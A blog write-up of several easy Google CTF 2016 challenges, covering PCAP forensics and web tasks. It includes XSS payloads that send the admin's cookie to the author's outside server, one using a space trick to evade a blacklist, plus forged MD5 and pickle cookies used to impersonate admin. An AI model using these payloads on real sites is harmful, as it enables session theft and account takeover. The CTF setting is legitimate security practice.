Google CTF 2016 - Some trivial challenges

Since I had a few hours to spare this weekend, I took a look at some of the trivial 25 and 50 point challenges that they offered. So here's a write-up of just that.

FOR50 - No Big Deal

Sometimes the answer is immediately obvious, sometimes it's obscured.

After opening the PCAP and checking the Protocol hierarchy, I just went and followed the TCP stream that was going on. Since it seemed to be some binary data, I extracted the data into a file and searched for interesting strings.

Protocol Hierarchy

TCP stream

One thing I usually do during CTFs, is to encode the prefix to all flags in base64. In this CTF, the prefix was 'CTF{', which is "Q1RGew==" in Base64. Grepping for it, yielded the flag.

$ strings -n 10 no-big-deal.txt | grep "Q1RGe" | perl -MMIME::Base64 -nle 'print decode_base64($_)'
CTF{betterfs.than.yours}
CTF{betterfs.than.yours}
CTF{betterfs.than.yours}
CTF{betterfs.than.yours}
CTF{betterfs.than.yours}
CTF{betterfs.than.yours}
CTF{betterfs.than.yours}
CTF{betterfs.than.yours}
CTF{betterfs.than.yours}
CTF{betterfs.than.yours}
CTF{betterfs.than.yours}
CTF{betterfs.than.yours}
CTF{betterfs.than.yours}
CTF{betterfs.than.yours}
CTF{betterfs.than.yours}
CTF{betterfs.than.yours}
CTF{betterfs.than.yours}
CTF{betterfs.than.yours}
CTF{betterfs.than.yours}
CTF{betterfs.than.yours}
CTF{betterfs.than.yours}
CTF{betterfs.than.yours}

flag: CTF{betterfs.than.yours}

FOR25 - In recorded conversation

Can you find the flag?

With just using Wireshark, we can find the flag split up in chunks...

Easy as A B C

flag: CTF{some_leaks_are_good_leaks_}

WEB25 - Wallowing Wallabies

Wallowing Wallabies provides enterprise contract management - we'd like to find out how easy it is to perform corporate espionage against them. Visit them here.

When we visit the website, we're presented with the following.

Homepage

As a good practice, we start by looking for the robots.txt and htaccess files. The robots.txt file is a hit:

User-agent: *
Disallow: /deep-blue-sea/
Disallow: /deep-blue-sea/team/
# Yes, these are alphabet puns :)
Disallow: /deep-blue-sea/team/characters
Disallow: /deep-blue-sea/team/paragraphs
Disallow: /deep-blue-sea/team/lines
Disallow: /deep-blue-sea/team/runes
Disallow: /deep-blue-sea/team/vendors

Visiting all the URLs, there's only one working. The vendors page.

Vendors page

Since this page tells us that an admin will view the message, we know we'll have to steal something that the admin can see or has. For example: his cookies.

Using by standard XSS cookie stealer, I inject the following

<script>image = new Image(); image.src='https://iaan.be/googlectf.php?boobz='+document.cookie;</script>

But it didn't work. :( So, I tried some other stuff and eventually got greeted with the following error message:

Handy error messages

So, changing my approach and putting the script above in a JavaScript file.

Storing the code in a JS file

I then got a visit in my log file from the admin:

green-mountains=eyJub25jZSI6ImY3ZjJlNWJkOTQxMDM5Y2EiLCJhbGxvd2VkIjoiXi9kZWVwLWJsdWUtc2VhL3RlYW0vdmVuZG9ycy4qJCIsImV4cGlyeSI6MTQ2MjAyMTY1Mn0=|1462021649|228a5e098df36848185d1269acff00de25965db2

Injecting the cookie and getting the flag:

Inject the cookie

I like cookies

flag: CTF{feeling_robbed_of_your_cookies}

WEB50 - Wallowing Wallabies II

In this phase, there's some blacklisting going on. Every "malicious" string is replaced by the string "ANTI*HACKER". Trying a few things, I noticed that script elements are not allowed and several events are also blacklisted. But I ended up with the following:

<input type="text" autofocus onfocus="image = new Image(); image.src = 'https://iaan.be/googlectf.php?boobz=sow'+document.cookie;" value="dikkenbal"/>

Notice the space between "src" and the equal sign, "src=" was blacklisted but "src =" is not. This gives us a new cookie:

green-mountains=eyJub25jZSI6IjUxNjgxYzFhZmNhNjUwNTAiLCJhbGxvd2VkIjoiXi9kZWVwLWJsdWUtc2VhL3RlYW0vY2hhcmFjdGVycy4qJCIsImV4cGlyeSI6MTQ2MjA0OTI3MH0=|1462049267|e6a525e5e1fb492b57245192e05d4a56c4aa05b1

Decoding it gives us the page we can access now:

$ echo "eyJub25jZSI6IjUxNjgxYzFhZmNhNjUwNTAiLCJhbGxvd2VkIjoiXi9kZWVwLWJsdWUtc2VhL3RlYW0vY2hhcmFjdGVycy4qJCIsImV4cGlyeSI6MTQ2MjA0OTI3MH0=" | base64 --decode
{"nonce":"51681c1afca65050","allowed":"^/deep-blue-sea/team/characters.*$","expiry":1462049270}

Visiting that page:

Flaggggg

flag: CTF{strict_contextual_autoescaping_to_solve_your_xss_woes}

WEB50 - Ernst Echidna

Can you hack this website? The robots.txt sure looks interesting.

Homepage

Checking the robots.txt file:

Disallow: /admin 

Not allowed access to admin page

But of course, we can't see anything. :(

So, let's register...

Registering...

but no content

Checking the cookies:

Cookies

Googling the MD5, gives us "huehue". So, the hash is equal to our username. Seems obvious to change it with "admin"...

Great success

flag: CTF{renaming-a-bunch-of-levels-sure-is-annoying}

WEB50 - Spotted Quoll

This blog on Zombie research looks like it might be interesting - can you break into the /admin section?

Homepage

Entering the Admin section just gives us a slightly different URL but the same page.

different url

Let's look at the cookies:

Cookies

Pickle is of course a reference to Python serialisation. So let's store the base64 decoded version and repickle the file to include the user "admin".

$ python unpickle.py 
{'python': 'pickles', 'subtle': 'hint', 'user': None}

Ok, seems easy enough to make the user "admin":

import pickle

hmpf = pickle.load(open("obsoletePickle", "rb"))
print hmpf
hmpf['user'] = 'admin'
pickle.dump(hmpf, open("notSoObsoletePickle", "wb"))
$ base64 notSoObsoletePickle 
KGRwMApTJ3B5dGhvbicKcDEKUydwaWNrbGVzJwpwMgpzUydzdWJ0bGUnCnAzClMnaGludCcKcDQKc1MndXNlcicKcDUKUydhZG1pbicKcDYKcy4=

Injecting the new pickle into the cookie as we've done before:

burp

flag: CTF{but_wait,theres_more.if_you_call}

*****
Written by Adriaan Dens on 02 May 2016